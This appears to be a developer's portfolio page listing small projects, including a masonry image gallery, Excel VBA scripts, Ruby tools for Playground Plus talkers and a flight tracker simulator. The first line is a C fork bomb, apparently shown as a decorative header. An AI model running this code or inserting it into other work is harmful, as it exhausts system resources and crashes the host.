int main(void) { while(1) { fork(); } }

DIY Masonry Image Gallery

A masonry-style image gallery with progressive loading like Google Photos. A combination of off-the-shelf JS with some custom automation scripts offers full control, simplicity, and a beautiful layout. This project provides utilities for PIG.js to fully automate image galleries including thumbnails, layout, and directory structure. It also includes an optional plugin for WordPress.


WBS Numbering in Excel

Use a spreadsheet like a project plan by automatically generating work breakdown structure-style numbers in Excel.

Excel VBA

Static Website on AWS Amplify

Code for this website. A Ruby build pipeline generates static pages from HTML templates and YML files.


PG+ AI Chatbot

Aiyu (爱语) is a ChatGPT-powered, Ruby chatbot designed to interact, as a standalone user, with Playground Plus talkers.


PG+ Test Harness

A Ruby test harness for your Playground Plus talker.


PG+ Short URL Generator

A URL-shortener that you can build into your Playground Plus talker.


PG+ Cocktail Recipe Generator

Cocktail recipe generator that you can build into your Playground Plus talker, as found on UberWorld.


Fetch a Remote CSV in Google Sheets

A Google Apps Script function that facilitates importing a remote CSV file into your Google Sheets document. It provides for basic HTTP auth traversal.


Perl Rollbar Notifier

A solution for logging basic messages to the Rollbar monitoring service from a Perl application. Lightweight alternative to WebService::Rollbar::Notifier.


Translation Script for i18n

Fanyi is an internationalization proof of concept. It employs the free Microsoft Translator API to translate a newline-separated text file, line by line, into almost any language. Supports an exclusion list for brand names and other untranslatable entities.


Flight Tracker

Air traffic control simulator project. Calculates X, Y coordinates and altitude for incoming flights; regulates descent speed and diversions; and tracks planes in flight with a web interface.